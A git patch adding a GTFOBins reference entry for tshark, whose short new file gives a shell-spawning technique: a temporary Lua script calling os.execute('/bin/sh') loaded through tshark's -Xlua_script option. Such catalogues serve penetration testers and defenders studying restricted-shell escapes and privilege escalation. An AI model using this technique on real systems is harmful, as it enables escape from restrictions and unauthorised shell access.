From ff4e89470dd6562d7312a7eb1f425c7de819093c Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Thu, 17 Jun 2021 08:51:51 +0200 Subject: [PATCH] Add tshark shell --- _gtfobins/tshark.md | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 _gtfobins/tshark.md diff --git a/_gtfobins/tshark.md b/_gtfobins/tshark.md new file mode 100644 index 0000000..3d25d27 --- /dev/null +++ b/_gtfobins/tshark.md @@ -0,0 +1,9 @@ +--- +description: This program is able to execute [`lua`](/gtfobins/less/) code. +functions: + shell: + - code: | + TF=$(mktemp) + echo 'os.execute("/bin/sh")' >$TF + tshark -Xlua_script:$TF +---